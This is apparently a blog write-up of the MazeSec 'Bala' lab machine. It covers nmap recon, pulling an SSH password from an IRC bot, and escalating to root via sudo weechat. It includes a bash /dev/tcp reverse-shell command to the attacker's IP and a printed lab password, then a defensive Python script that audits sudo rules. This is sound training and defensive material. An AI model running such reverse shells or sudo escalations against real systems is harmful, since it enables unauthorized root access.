Bala[MazeSec]

Aristore

Information gathering

┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.12.142 08:00:27:64:30:cb PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.12.142

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 21:10 CST
Nmap scan report for 192.168.12.142
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: IRC\xE9\x80\x9A\xE4\xBF\xA1\xE5\x8D\x8F\xE8\xAE\xAE - \xE6\x9A\x97\xE9\xBB\x91\xE4\xB8\xBB\xE9\xA2\x98
6667/tcp open irc
| irc-info:
| users: 2
| servers: 1
| chans: 4
| lusers: 2
| lservers: 0
| server: irc.local
| version: InspIRCd-3. irc.local
| source ident: nmap
| source host: 192.168.12.55
|_ error: Closing link: (nmap@192.168.12.55) [Client exited]
MAC Address: 08:00:27:64:30:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: irc.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.12.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds

Port 6667 is running an InspIRCd service; connect to it with HexChat:

[Screenshot: PenTest_MazeSec_Bala-1]

[Screenshot: PenTest_MazeSec_Bala-2]

With the connection set up like this, just click Connect.

[Screenshot: PenTest_MazeSec_Bala-3]

In the pop-up window, tick "Open the channel list" to see which channels exist.

[Screenshot: PenTest_MazeSec_Bala-4]

Then join them one by one.

Information obtained right after logging in:

[Screenshot: PenTest_MazeSec_Bala-5]

Checking the four channels on the left one by one shows that the operator of every channel is bala, so open a private chat with bala:

<root> 111
<bala> 未知命令,可用命令: getpassword, help, info
<root> getpassword
<bala> 密码: ai01ClGAXoYpeevwNMS1
<bala> 此密码为敏感信息,请妥善保管
<root> help
<bala> 可用命令:
<bala> getpassword - 获取密码
<bala> help - 显示帮助
<bala> info - 机器人信息
* DCC CHAT '' to bala timed out, aborting.
<root> info
<bala> Simple IRC Bot v2.0
<bala> 功能: 密码管理、频道通信

The password is presumably the SSH credential, and the name "fzer" seen right after logging in looks suspicious, probably a username. Try logging in with it:

┌──(root㉿kali)-[~]
└─# ssh fzer@$IP
The authenticity of host '192.168.12.142 (192.168.12.142)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:2: [hashed name]
~/.ssh/known_hosts:4: [hashed name]
~/.ssh/known_hosts:5: [hashed name]
~/.ssh/known_hosts:12: [hashed name]
~/.ssh/known_hosts:13: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.142' (ED25519) to the list of known hosts.
fzer@192.168.12.142's password:
Linux Bala 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Nov 7 11:31:34 2025 from 192.168.12.55
fzer@Bala:~$ id
uid=1000(fzer) gid=1000(fzer) groups=1000(fzer)

Privilege escalation

List the commands the current user is allowed to run via sudo:

fzer@Bala:~$ sudo -l
[sudo] password for fzer:
Matching Defaults entries for fzer on Bala:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fzer may run the following commands on Bala:
(ALL) PASSWD: /usr/bin/weechat

weechat is a command-line IRC client; launch it with sudo /usr/bin/weechat.

[Screenshot: PenTest_MazeSec_Bala-6]

Running /exec -o /bin/bash produces no output, so try a reverse shell instead:

/exec bash -c 'bash -i >& /dev/tcp/192.168.12.55/4444 0>&1'

This yields a root shell.

[Screenshot: PenTest_MazeSec_Bala-7]
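As an added defender's check (not part of the original writeup), the script below parses `sudo -l` output like the one above and flags rules that let a user run, as root, a program which can spawn subprocesses from its own interface, as weechat's /exec does. The sample input is constructed from the writeup's output plus one harmless extra rule, and the SHELL_CAPABLE set is an assumption to be extended from your own inventory.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample input: the `sudo -l` output for fzer on Bala from the
# writeup, plus one benign rule so the audit has something to ignore.
SAMPLE_SUDO_L = """\
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat
    (root) NOPASSWD: /usr/bin/apt-get update
"""

# Programs that can start arbitrary subprocesses from inside their own UI
# (weechat via /exec, as the writeup shows). Assumption: illustrative, not exhaustive.
SHELL_CAPABLE = {"weechat", "bash", "sh"}

# One sudo rule line: "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str

def parse_sudo_l(text: str) -> list[SudoRule]:
    """Collect the command rules listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = m.group("tags").split()
            rules.append(SudoRule(m.group("runas").strip(), "NOPASSWD:" in tags, m.group("cmd").strip()))
    return rules

def audit(rules: list[SudoRule]) -> list[str]:
    """Flag rules that grant root execution of a subprocess-capable program."""
    findings = []
    for r in rules:
        prog = r.command.split()[0].rsplit("/", 1)[-1]          # basename of the binary
        runas_root = r.runas.split(":")[0].strip() in ("ALL", "root")
        if runas_root and prog in SHELL_CAPABLE:
            pw = "without" if r.nopasswd else "with"
            findings.append(f"{r.command}: runs as root ({r.runas}) {pw} a password prompt and can "
                            f"spawn subprocesses, so it is equivalent to a root shell; remove the rule")
    return findings

if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

Feed it the output of `sudo -l -U <user>` for each account when reviewing a host; the PASSWD tag is not a mitigation here, since the user already knows their own password.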

  • Title: Bala[MazeSec]
  • Author: Aristore
  • Link: https://www.aristore.top/posts/PenTest_MazeSec_Bala/
  • Copyright: © Aristore, all rights reserved. Reproduction prohibited.